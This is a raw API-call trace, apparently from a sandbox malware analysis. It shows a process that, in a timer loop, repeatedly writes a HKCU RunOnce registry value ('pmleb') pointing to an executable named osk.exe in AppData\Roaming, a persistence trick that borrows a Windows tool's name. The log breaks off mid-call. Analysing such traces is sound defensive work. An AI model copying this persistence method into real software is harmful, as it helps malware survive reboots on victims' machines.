[0099.284] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.284] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.284] KillTimer (hWnd=0x20280, uIDEvent=0x2315) returned 1 [0099.284] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.285] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.285] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.285] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.285] RegCloseKey (hKey=0x280) returned 0x0 [0099.285] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.285] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.285] SetTimer (hWnd=0x20280, nIDEvent=0x2316, uElapse=0xa, lpTimerFunc=0x0) returned 0x2316 [0099.286] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.300] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.300] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.300] KillTimer (hWnd=0x20280, uIDEvent=0x2316) returned 1 [0099.300] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.301] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.301] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.301] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.301] RegCloseKey (hKey=0x280) returned 0x0 [0099.301] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.301] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.301] SetTimer (hWnd=0x20280, nIDEvent=0x2317, uElapse=0xa, lpTimerFunc=0x0) returned 0x2317 [0099.302] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.315] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.315] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.316] KillTimer (hWnd=0x20280, uIDEvent=0x2317) returned 1 [0099.316] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.317] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.317] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.317] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.317] RegCloseKey (hKey=0x280) returned 0x0 [0099.318] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.318] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.318] SetTimer (hWnd=0x20280, nIDEvent=0x2318, uElapse=0xa, lpTimerFunc=0x0) returned 0x2318 [0099.318] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.331] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.331] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.331] KillTimer (hWnd=0x20280, uIDEvent=0x2318) returned 1 [0099.331] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.332] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.332] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.332] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.332] RegCloseKey (hKey=0x280) returned 0x0 [0099.332] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.333] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.333] SetTimer (hWnd=0x20280, nIDEvent=0x2319, uElapse=0xa, lpTimerFunc=0x0) returned 0x2319 [0099.333] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.349] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.349] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.349] KillTimer (hWnd=0x20280, uIDEvent=0x2319) returned 1 [0099.349] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.350] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.350] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.350] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.350] RegCloseKey (hKey=0x280) returned 0x0 [0099.350] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.350] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.351] SetTimer (hWnd=0x20280, nIDEvent=0x231a, uElapse=0xa, lpTimerFunc=0x0) returned 0x231a [0099.351] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.362] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.362] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.362] KillTimer (hWnd=0x20280, uIDEvent=0x231a) returned 1 [0099.362] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.363] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.363] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.363] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.363] RegCloseKey (hKey=0x280) returned 0x0 [0099.363] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.363] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.364] SetTimer (hWnd=0x20280, nIDEvent=0x231b, uElapse=0xa, lpTimerFunc=0x0) returned 0x231b [0099.364] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.378] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.378] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.378] KillTimer (hWnd=0x20280, uIDEvent=0x231b) returned 1 [0099.378] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.379] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.379] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.379] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.379] RegCloseKey (hKey=0x280) returned 0x0 [0099.379] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.379] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.379] SetTimer (hWnd=0x20280, nIDEvent=0x231c, uElapse=0xa, lpTimerFunc=0x0) returned 0x231c [0099.379] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.393] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.393] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.393] KillTimer (hWnd=0x20280, uIDEvent=0x231c) returned 1 [0099.393] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.394] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.394] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.394] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.394] RegCloseKey (hKey=0x280) returned 0x0 [0099.394] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.394] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.394] SetTimer (hWnd=0x20280, nIDEvent=0x231d, uElapse=0xa, lpTimerFunc=0x0) returned 0x231d [0099.394] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.409] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.409] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.409] KillTimer (hWnd=0x20280, uIDEvent=0x231d) returned 1 [0099.409] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.409] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.409] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.410] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.410] RegCloseKey (hKey=0x280) returned 0x0 [0099.410] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.410] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.410] SetTimer (hWnd=0x20280, nIDEvent=0x231e, uElapse=0xa, lpTimerFunc=0x0) returned 0x231e [0099.410] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.424] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.424] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.425] KillTimer (hWnd=0x20280, uIDEvent=0x231e) returned 1 [0099.425] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.425] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.425] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.426] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.426] RegCloseKey (hKey=0x280) returned 0x0 [0099.426] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.426] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.426] SetTimer (hWnd=0x20280, nIDEvent=0x231f, uElapse=0xa, lpTimerFunc=0x0) returned 0x231f [0099.426] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.440] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.440] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.440] KillTimer (hWnd=0x20280, uIDEvent=0x231f) returned 1 [0099.440] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.441] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.441] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.441] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.441] RegCloseKey (hKey=0x280) returned 0x0 [0099.441] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.441] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.441] SetTimer (hWnd=0x20280, nIDEvent=0x2320, uElapse=0xa, lpTimerFunc=0x0) returned 0x2320 [0099.442] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.456] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.456] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.456] KillTimer (hWnd=0x20280, uIDEvent=0x2320) returned 1 [0099.456] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.456] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.456] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.457] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.457] RegCloseKey (hKey=0x280) returned 0x0 [0099.457] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.457] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.457] SetTimer (hWnd=0x20280, nIDEvent=0x2321, uElapse=0xa, lpTimerFunc=0x0) returned 0x2321 [0099.457] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.471] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.471] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.471] KillTimer (hWnd=0x20280, uIDEvent=0x2321) returned 1 [0099.472] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.473] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.474] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.475] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.475] RegCloseKey (hKey=0x280) returned 0x0 [0099.475] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.475] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.475] SetTimer (hWnd=0x20280, nIDEvent=0x2322, uElapse=0xa, lpTimerFunc=0x0) returned 0x2322 [0099.475] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.488] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.488] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.488] KillTimer (hWnd=0x20280, uIDEvent=0x2322) returned 1 [0099.488] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.489] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.489] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.489] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.489] RegCloseKey (hKey=0x280) returned 0x0 [0099.489] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.490] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.490] SetTimer (hWnd=0x20280, nIDEvent=0x2323, uElapse=0xa, lpTimerFunc=0x0) returned 0x2323 [0099.490] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.502] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.502] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.502] KillTimer (hWnd=0x20280, uIDEvent=0x2323) returned 1 [0099.503] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.503] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.503] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.503] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.504] RegCloseKey (hKey=0x280) returned 0x0 [0099.504] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.504] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.504] SetTimer (hWnd=0x20280, nIDEvent=0x2324, uElapse=0xa, lpTimerFunc=0x0) returned 0x2324 [0099.504] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.518] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.518] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.518] KillTimer (hWnd=0x20280, uIDEvent=0x2324) returned 1 [0099.519] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.519] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.519] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.519] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.520] RegCloseKey (hKey=0x280) returned 0x0 [0099.520] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.520] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.520] SetTimer (hWnd=0x20280, nIDEvent=0x2325, uElapse=0xa, lpTimerFunc=0x0) returned 0x2325 [0099.520] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.534] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.534] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.534] KillTimer (hWnd=0x20280, uIDEvent=0x2325) returned 1 [0099.534] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.535] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.535] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.535] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.535] RegCloseKey (hKey=0x280) returned 0x0 [0099.535] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.536] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.536] SetTimer (hWnd=0x20280, nIDEvent=0x2326, uElapse=0xa, lpTimerFunc=0x0) returned 0x2326 [0099.536] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.549] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.549] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.549] KillTimer (hWnd=0x20280, uIDEvent=0x2326) returned 1 [0099.549] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.550] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.550] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.550] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.550] RegCloseKey (hKey=0x280) returned 0x0 [0099.550] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.550] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.551] SetTimer (hWnd=0x20280, nIDEvent=0x2327, uElapse=0xa, lpTimerFunc=0x0) returned 0x2327 [0099.551] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.565] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.565] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.565] KillTimer (hWnd=0x20280, uIDEvent=0x2327) returned 1 [0099.566] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.566] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.566] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.566] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 